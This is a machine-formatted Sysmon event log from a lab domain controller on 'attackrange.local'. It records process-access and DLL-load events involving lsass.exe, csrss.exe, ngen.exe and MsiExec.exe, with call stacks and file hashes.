14:57:20.905{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-FC0B-00000000BB01}3388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.905{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-FC0B-00000000BB01}3388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.905{A7A01FEF-EBD0-607E-FC0B-00000000BB01}3388C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.889{A7A01FEF-EBD0-607E-FD0B-00000000BB01}63966748C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-FC0B-00000000BB01}3388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.889{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-FD0B-00000000BB01}6396C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.874{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-FC0B-00000000BB01}3388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.874{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-FC0B-00000000BB01}3388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.874{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-FA0B-00000000BB01}4548c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.874{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-FA0B-00000000BB01}4548c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.874{A7A01FEF-EBD0-607E-FA0B-00000000BB01}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.858{A7A01FEF-EBD0-607E-FB0B-00000000BB01}33766136C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-FA0B-00000000BB01}4548c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.843{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-FB0B-00000000BB01}3376C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.843{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-FA0B-00000000BB01}4548c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.843{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-FA0B-00000000BB01}4548c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.827{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-F80B-00000000BB01}6388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.827{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-F80B-00000000BB01}6388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.827{A7A01FEF-EBD0-607E-F80B-00000000BB01}6388C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.811{A7A01FEF-EBD0-607E-F90B-00000000BB01}62763712C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-F80B-00000000BB01}6388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.811{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-F90B-00000000BB01}6276C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.796{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-F80B-00000000BB01}6388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.796{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-F80B-00000000BB01}6388c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.796{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-F60B-00000000BB01}1148c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.796{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-F60B-00000000BB01}1148c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.796{A7A01FEF-EBD0-607E-F60B-00000000BB01}1148C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.765{A7A01FEF-EBD0-607E-F70B-00000000BB01}58524340C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-F60B-00000000BB01}1148c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.765{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-F70B-00000000BB01}5852C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.765{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-F60B-00000000BB01}1148c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.765{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-F60B-00000000BB01}1148c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.749{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-F40B-00000000BB01}6524c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.749{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-F40B-00000000BB01}6524c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.749{A7A01FEF-EBD0-607E-F40B-00000000BB01}6524C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 